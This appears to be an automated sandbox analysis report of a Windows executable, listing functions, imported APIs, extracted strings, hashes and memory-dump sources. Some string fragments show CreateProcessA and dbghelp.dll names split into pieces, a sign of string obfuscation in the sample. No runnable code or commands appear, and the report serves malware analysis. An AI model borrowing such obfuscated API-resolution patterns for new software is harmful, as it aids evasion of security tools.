                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$HandleModule$DesktopParentWindow
                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                          • API String ID: 3111795765-3772416878
                                                                                                                                                                                                          • Opcode ID: f3d1cc485e85a0bd6be8a46e9fdf924ff3358afce327145a664a617941d18095
                                                                                                                                                                                                          • Instruction ID: 4513cb7a96d43f8e1d4454285632cde748bd3002f6849a7d12320632e4c138d5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3d1cc485e85a0bd6be8a46e9fdf924ff3358afce327145a664a617941d18095
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E313875D01209ABDB00DFA4DD04BEEBBB5FF99318F10126AF501B6290DBB11A848F94
                                                                                                                                                                                                          Function 004840F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00484181
                                                                                                                                                                                                          • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00484197
                                                                                                                                                                                                          • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 004841AF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Concurrency::task_continuation_context::task_continuation_context
                                                                                                                                                                                                          • String ID: $-$.$_$~
                                                                                                                                                                                                          • API String ID: 2914748677-1535613121
                                                                                                                                                                                                          • Opcode ID: 35760dffdc4fa7de238cc774249b3fd331e70eee086b4e023761f6ce5640bff6
                                                                                                                                                                                                          • Instruction ID: 10ac112a0551a7d84930f047cb1cee5c0e1a72d512ff4e08fd23859abb1faaac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35760dffdc4fa7de238cc774249b3fd331e70eee086b4e023761f6ce5640bff6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42217C31E442198EDB00EFA98C0D6FE77B06FA9300F08096FE44567282CE2C49C1D795
                                                                                                                                                                                                          Function 00438010 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 62libraryloadersynchronizationCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00438062
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00438095
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004380A4
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004380A9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$CloseHandle$AddressEnterInit_thread_footerInitializeLeaveObjectProcSingleWait
                                                                                                                                                                                                          • String ID: Crea$oces$sA$tePr
                                                                                                                                                                                                          • API String ID: 161278594-524377044
                                                                                                                                                                                                          • Opcode ID: 3fbf7bea019f379f32c62ff8c6c1f32f524e1882701429b34ae0f07772972aac
                                                                                                                                                                                                          • Instruction ID: d0ccd7e3aac2de8c47f5c27a7e95cd3a8b4b386cea1219e15722d381bdd0137f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fbf7bea019f379f32c62ff8c6c1f32f524e1882701429b34ae0f07772972aac
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0118B35A00208ABCB10DFA9CC44BEFBBF8EF59660F155129F504B7250DB30AA84CBA0
                                                                                                                                                                                                          Function 00486570 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 468libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00486C50: GetProcAddress.KERNEL32(?,?), ref: 0048732E
                                                                                                                                                                                                            • Part of subcall function 00486C50: GetProcAddress.KERNEL32(?,?), ref: 004873E2
                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00486692
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                          • String ID: InsLog$Item$erPa$labelid$xml version="1.0" encoding="UTF-8"
                                                                                                                                                                                                          • API String ID: 190572456-2764935047
                                                                                                                                                                                                          • Opcode ID: f7ac147004c2e197bc8b527109ee1ae22d58027ffb02cc7cba63ead177b1b591
                                                                                                                                                                                                          • Instruction ID: 31467695ff51873745818196bd3a6fff3c52aedbaddba9a9abc6e057d1bce80e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7ac147004c2e197bc8b527109ee1ae22d58027ffb02cc7cba63ead177b1b591
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2128FB09002198FDB64EF14C988BDEBBB4BF44304F1545EED449AB281DBB99AC5CF94
                                                                                                                                                                                                          Function 004401E0 Relevance: 10.8, APIs: 2, Strings: 5, Instructions: 350COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(000003A8,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00440472
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(000003A8,00000000,?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004404DD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide
                                                                                                                                                                                                          • String ID: page2_bottom_check_group%d$page2_check_hk_%d$page2_check_hk_text_%d$page2_check_lk_%d$page2_check_lk_text_%d
                                                                                                                                                                                                          • API String ID: 626452242-169679372
                                                                                                                                                                                                          • Opcode ID: 406c1469c60aa1b0cfed930fdf73f4c3bbb80f238e5a0c5282f1cec0c4adec47
                                                                                                                                                                                                          • Instruction ID: d06ddd16359877ff06ef5ccb26d4523b776113a213bef8885153a17b03bd206d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 406c1469c60aa1b0cfed930fdf73f4c3bbb80f238e5a0c5282f1cec0c4adec47
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1D1C770901215AFEB20DB64CC8DFAABBB8EF48304F1441E9E50DA7282D775AE94CF54
                                                                                                                                                                                                          Function 004564F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597E68), ref: 0045655E
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0045657A
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL ref: 00456595
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597E68), ref: 004566DA
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID: hh~Y$h~Y
                                                                                                                                                                                                          • API String ID: 916978925-281131063
                                                                                                                                                                                                          • Opcode ID: 4ea2316aa3b1e24c9bcabe1bc25cbcf1e9a24ee90582f10ab52e85fa5bd8347f
                                                                                                                                                                                                          • Instruction ID: 0fd103464ce6ad472cfb0f9f17efa321cc6ce69c1eee7d3c7e6b10f62d289a95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea2316aa3b1e24c9bcabe1bc25cbcf1e9a24ee90582f10ab52e85fa5bd8347f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70515B70815B88DFE720CF68D50978ABFF0FB18718F108A5ED49A97781D7B96608CB85
                                                                                                                                                                                                          Function 004083A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597B74), ref: 0040840F
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0040842B
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597B74), ref: 00408446
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597B74), ref: 00408517
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID: ht{Y$t{Y
                                                                                                                                                                                                          • API String ID: 916978925-2285465967
                                                                                                                                                                                                          • Opcode ID: ecfe80339bbb72631f42857859d98e6dd34d3a0e63a98b519c52c83b49425721
                                                                                                                                                                                                          • Instruction ID: dcf3a41d64c0706bf5efad368af1ded3e6e7c937e7379ded07362a9f70e5c64f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecfe80339bbb72631f42857859d98e6dd34d3a0e63a98b519c52c83b49425721
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3941A970A0864AEBDB10DF68D90978EFBE4FB94714F10429BE418A73D0EBB52604CB91
                                                                                                                                                                                                          Function 0046E2C0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,EFE0703F,00000000), ref: 0046E325
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0046E348
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                          • String ID: dbgh$dll$elp.$pF
                                                                                                                                                                                                          • API String ID: 2574300362-3995350128
                                                                                                                                                                                                          • Opcode ID: 04596cd7c4bebc8a8eec01d93673bd1038051d8ff990083c116c79df0d8d6966
                                                                                                                                                                                                          • Instruction ID: ab8c29164d7639cdc1ae5bcddf31798c7744adad730962cbd2eee6e0ac756f2f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04596cd7c4bebc8a8eec01d93673bd1038051d8ff990083c116c79df0d8d6966
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 631158B0C04619DFDB14CF98E845BAEBBF8FF08704F00862EE815A3640EB74A544CB94
                                                                                                                                                                                                          Function 00530045 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00534703: GetLastError.KERNEL32(?,?,00524F60,0058C738,00000010), ref: 00534707
                                                                                                                                                                                                            • Part of subcall function 00534703: _free.LIBCMT ref: 0053473A
                                                                                                                                                                                                            • Part of subcall function 00534703: SetLastError.KERNEL32(00000000), ref: 0053477B
                                                                                                                                                                                                            • Part of subcall function 00534703: _abort.LIBCMT ref: 00534781
                                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 005302EF
                                                                                                                                                                                                          • _free.LIBCMT ref: 00530360
                                                                                                                                                                                                          • _free.LIBCMT ref: 00530379
                                                                                                                                                                                                          • _free.LIBCMT ref: 005303AB
                                                                                                                                                                                                          • _free.LIBCMT ref: 005303B4
                                                                                                                                                                                                          • _free.LIBCMT ref: 005303C0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1679612858-0
                                                                                                                                                                                                          • Opcode ID: 7c28300d30a2e01f8a24e8018a5ee38dbd121ccc91ba690453be9c10156dc588
                                                                                                                                                                                                          • Instruction ID: 7ac775a9220d468c373f7f1dfbd03a58822fafefdf22d3025bc52b1fca9c98a9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c28300d30a2e01f8a24e8018a5ee38dbd121ccc91ba690453be9c10156dc588
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10B10975A0131ADFDB24DF18C899AADBBB4FF48304F5045AAE849A7390D771AE90CF40
                                                                                                                                                                                                          Function 004803C0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 352COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Mpunctctypestd::ios_base::width
                                                                                                                                                                                                          • String ID: ?p$@
                                                                                                                                                                                                          • API String ID: 3537416286-91208078
                                                                                                                                                                                                          • Opcode ID: 6c688737dc7317669eaf57710734688416a199bed6c3cae06b86dd0d44e4d75d
                                                                                                                                                                                                          • Instruction ID: 043d6d44f0a8152379de08877663cdff38541a1f6531e52b31651c7c046dfbf0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c688737dc7317669eaf57710734688416a199bed6c3cae06b86dd0d44e4d75d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1E13E71A10148DFCB04EF98C991AEEBBB5BF48304F14855EF909AB291D738AE45CF94
                                                                                                                                                                                                          Function 0043A500 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 306COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile$AddressByteCharMultiProcWide
                                                                                                                                                                                                          • String ID: "%s%s"$"%s%s" %s$feirar
                                                                                                                                                                                                          • API String ID: 793792645-3199780743
                                                                                                                                                                                                          • Opcode ID: 8b8609be7a185562f73ad3219647ffe7627bcc46f96add53f677c349dd5e59c2
                                                                                                                                                                                                          • Instruction ID: 0c80a1f9fbdb3b4982757e3e4d378dad1e4a91e7e90a7f80602a8525095b87a1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b8609be7a185562f73ad3219647ffe7627bcc46f96add53f677c349dd5e59c2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1C11770640204ABDB25DF24C889BDAF7A5FF09304F0451ABE8599B2C1D7786EE4CB97
                                                                                                                                                                                                          Function 004681F0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 290COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___from_strstr_to_strchr.LIBCMT ref: 00468283
                                                                                                                                                                                                          • ___from_strstr_to_strchr.LIBCMT ref: 00468299
                                                                                                                                                                                                          • ___from_strstr_to_strchr.LIBCMT ref: 004682E2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___from_strstr_to_strchr
                                                                                                                                                                                                          • String ID: %02X$in_disk
                                                                                                                                                                                                          • API String ID: 601868998-2956902724
                                                                                                                                                                                                          • Opcode ID: 52d3c2e3424f10aac8d941eebdd74e73d3cdc05850819a237190403e763b83e8
                                                                                                                                                                                                          • Instruction ID: 1989c8043e0b72275f30128f3445b6a3fb688df9cebe7e95dd5a1952a8af302c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52d3c2e3424f10aac8d941eebdd74e73d3cdc05850819a237190403e763b83e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCB126716083429BD730DB24CC45BABBBE8BF85304F044A7EF9C997642EB7495488B93
                                                                                                                                                                                                          Function 0045A170 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 286synchronizationCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _strrchr.LIBCMT ref: 0045A3BD
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,?), ref: 0045A4D3
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0045A4E5
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0045A4ED
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
